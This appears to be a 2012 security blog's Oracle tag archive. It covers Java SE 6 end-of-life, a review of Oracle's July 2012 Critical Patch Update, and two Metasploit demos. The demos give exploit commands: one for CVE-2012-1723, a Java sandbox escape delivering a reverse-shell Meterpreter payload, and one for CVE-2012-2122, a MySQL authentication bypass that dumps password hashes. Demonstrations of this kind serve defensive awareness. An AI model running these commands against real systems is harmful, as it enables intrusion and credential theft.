Tag Archives: Oracle

Oracle Push Java SE 7 Update to Uninstall Version 6

Last release of Java SE 6, version 6 update 33(1.6.0_33-b03), was done the 12 Jun 2012 during quarterly Oracle Java CPU (Critical Patch Update). This CPU had fix 14 security vulnerabilities in previous JSE products versions 7, 6, 5 and 4. One of these vulnerabilities was CVE-2012-1723 how is actually used in Blackhole exploit kit.

Metasploit exploitation demonstration of CVE-2012-1723

Since few days you may have see a notification on you system asking you to update Java.

By getting details on the update you will see that Java SE 7 update 5 (1.7_5) is available and by installing this update your previous version of JSE will removed. However, if you wish to keep Java 6 you will need to update from the offline Java installer to the latest version of JSE, how is version 7 update 5. Hu ! What a choice, I have to update to version 7 or to update to version 7.

As you may know Java SE 6 will be no longer supported after November 2012.  The last Java CPU update is planned for 2012, October 12. After November 2012, Oracle will no longer post updates of Java SE 6 to its public download sites. For enterprise customers, who need continued access to critical bug fixes and security fixes as well as general maintenance for Java SE 6 or older versions, long-term support is available through Oracle Java SE Support . But it seem through this forced Java SE update to version 7 that Java SE 6 update 33 was the last one.

So we are encouraging you to plan a mega release on your infrastructures, cause Java SE 6 seem to be officially dead !

Oracle Critical Patch Update Announcement for July 2012 Review

Oracle has provide his Critical Patch Update (CPU) Pre-Release Announcement for July 2012 how will be released on Tuesday, July 17. This CPU contains 88 security vulnerability fixes across hundreds of Oracle products… Some of the vulnerabilities affect multiple Oracle products. On the 88 security vulnerabilities and 37 of them may be remotely exploitable without authentication, this represent 42% of the vulnerabilities. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0 and concern Oracle Fusion Middleware.

As you may know Oracle is using CVSS 2.0 (Common Vulnerability Scoring System) in order to score the reported vulnerabilities. But as you also may know security researchers disagree with the usage of CVSS by Oracle. Oracle play with CVSS score by creating a “Partial+” impact rating how don’t exist in CVSS 2.0, and by interpreting the “Complete” rating in a different way than defined in CVSS 2.0.

Oracle Database Server

4 vulnerabilities are reported for “Oracle Database Server” and 3 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 5.0. Affected components are “Core RDBMS” and “Network Layer“.

Oracle Application Express Listener

1 vulnerability his reported for “Oracle Application Express Listener” and this vulnerability may be remotely exploitable without authentication. The CVSS score of this vulnerability is 7.8. Affected component is “Oracle Application Express Listener“.

Oracle Secure Backup

2 vulnerabilities are reported for “Oracle Secure Backup” and both may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 7.8. Affected components are “Apache” and “PHP“.

Oracle Fusion Middleware

22 vulnerabilities are reported for “Oracle Fusion Middleware” and 8 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 10.0. Affected components are “Enterprise Manager for Fusion Middleware“, “Oracle HTTP Server“, “Oracle JRockit“, “Oracle MapViewer“, “Oracle Outside In Technology” and “Portal“.

Oracle Hyperion

1 vulnerability his reported for “Oracle Hyperion” and this vulnerability may be remotely exploitable without authentication. The CVSS score of this vulnerability is 4.3. Affected component is “Hyperion BI+“.

Oracle Enterprise Manager Grid Control

1 vulnerability his reported for “Oracle Enterprise Manager Grid Control” and this vulnerability may be remotely exploitable without authentication. The CVSS score of this vulnerability is 6.8. Affected component is “Enterprise Manager for Oracle Database“.

Oracle E-Business Suite

4 vulnerabilities are reported for “Oracle E-Business Suite”  and 2 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 4.3. Affected components are “Oracle Application Object Library” and “Oracle E-Business Intelligence“.

Oracle Supply Chain Products Suite

5 vulnerabilities are reported for “Oracle Supply Chain Products Suite” and 1 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 4.3. Affected components are “Oracle AutoVue” and “Oracle Transportation Management“.

Oracle PeopleSoft Products

9 vulnerabilities are reported for “Oracle PeopleSoft Products” and none of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 5.5. Affected components are “PeoleSoft Enterprise PeopleTools“, “PeopleSoft Enterprise HRMS” and “PeopleSoft Enterprise PeopleTools“.

Oracle Siebel CRM

7 vulnerabilities are reported for “Oracle Siebel CRM” and 2 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 6.8. Affected component is “Siebel CRM“.

Oracle Industry Applications

1 vulnerability his reported for “Oracle Industry Applications” and is not remotely exploitable without authentication. The CVSS score of this vulnerability is 2.8. Affected component is “Oracle Clinical Remote Data Capture Option“.

Oracle Sun Products Suite

25 vulnerabilities are reported for “Oracle Sun Products Suite” and 17 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 7.8. Affected components are “GlassFish Enterprise Server“, “Oracle iPlanet Web Server“, “Solaris“, “Solaris Cluster” and “SPARC T-Series Servers“.

Oracle MySQL

6 vulnerabilities are reported for “Oracle MySQL” and none of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 6.8. Affected component is “MySQL Server“.

CVE-2012-1723 Oracle Java Applet Field Bytecode Verifier Cache RCE Metasploit Demo

Timeline :

Public release of the vulnerability the 2012-06-12
First PoC provided by Michael Schierl the 2012-06-13
Metasploit PoC provided the 2012-07-09

PoC provided by :

Stefan Cornellius
mihi
littlelightlittlefire
juan vazquez
sinn3r

Reference(s) :

CVE-2012-1723
OSVDB-82877
BID-52161
Oracle Java SE Critical Patch Update Advisory – June 2012

Affected version(s) :

Oracle Java JSE 7 Update 4 and before
Oracle Java JSE 6 Update 32 and before
Oracle Java JSE 5 Update 35 and before
Oracle Java JSE 1.4.2_37 and before

Tested on Windows XP Pro SP3 with :

Oracle JSE 1.6.0_32-b05

Description :

This module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficent type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Commands :

use exploit/multi/browser/java_verifier_field_access
set SRVHOST 192.168.178.100
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-2122 Oracle MySQL Authentication Bypass Password Dump Metasploit Demo

Timeline :

Vulnerability discovered by Sergei Golubchik in April 2012
Bug reported to vendor by Sergei Golubchik the 2012-04-06
Public release of the vulnerability the 2012-06-09
Metasploit PoC provided the 2012-06-11

PoC provided by :

Yorick Koster
jcran

Reference(s) :

CVE-2012-2122
Oracle MySQL BUG 64884
Oracle MySQL 5.1.63 Changes
Oracle MySQL 5.5.24 Changes

Affected version(s) :

Oracle MySQL versions before or equal to 5.1.61 (on some platforms)
Oracle MySQL versions before or equal to 5.5.24 (on some platforms)

Tested on Fedora release 16 (Verne) with :

5.5.23 MySQL Community Server

Description :

The targeted username will need to have allowed remote connections, like :

grant all on *.* to root@'%' identified by 'password';

This module exploits a password bypass vulnerability in MySQL in order to extract the usernames and encrypted password hashes from a MySQL server. These hashes ares stored as loot for later cracking.

Commands :

use auxiliary/scanner/mysql/mysql_authbypass_hashdump
set RHOSTS 192.168.178.43
set USERNAME root
run